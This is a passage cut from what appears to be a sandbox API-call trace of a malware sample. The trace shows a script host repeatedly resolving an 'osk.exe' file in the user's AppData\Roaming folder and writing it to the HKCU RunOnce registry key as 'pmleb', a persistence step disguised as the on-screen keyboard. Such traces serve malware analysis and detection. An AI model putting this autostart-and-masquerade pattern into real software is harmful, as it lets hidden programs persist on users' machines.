HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.737] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.737] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.738] RegCloseKey (hKey=0x280) returned 0x0 [0081.738] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.738] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.738] SetTimer (hWnd=0x20280, nIDEvent=0x20c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c4 [0081.738] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.752] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.752] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.752] KillTimer (hWnd=0x20280, uIDEvent=0x20c4) returned 1 [0081.753] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.753] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.753] IUnknown:Release (This=0x787518) returned 0x1 [0081.753] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.753] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.753] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.753] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.754] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0081.754] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.754] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4a [0081.754] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.755] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0081.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.755] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.755] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.755] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.755] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.755] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.756] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.756] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.756] RegCloseKey (hKey=0x280) returned 0x0 [0081.756] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.756] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.756] SetTimer (hWnd=0x20280, nIDEvent=0x20c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c5 [0081.756] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.765] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.765] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.765] KillTimer (hWnd=0x20280, uIDEvent=0x20c5) returned 1 [0081.765] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.766] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.766] IUnknown:Release (This=0x787518) returned 0x1 [0081.766] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.766] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.766] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.766] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.766] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0081.766] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.767] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4b [0081.767] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.767] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0081.767] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.768] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.768] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.768] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.768] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.768] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.768] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.768] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.768] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.768] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.768] RegCloseKey (hKey=0x280) returned 0x0 [0081.769] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.769] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.769] SetTimer (hWnd=0x20280, nIDEvent=0x20c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c6 [0081.769] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.781] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.781] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.781] KillTimer (hWnd=0x20280, uIDEvent=0x20c6) returned 1 [0081.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.781] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.781] IUnknown:Release (This=0x787518) returned 0x1 [0081.781] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.781] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.781] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.782] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.782] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0081.782] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.782] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4c [0081.782] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.783] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0081.783] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.783] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.783] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.783] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.783] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.783] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.783] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, 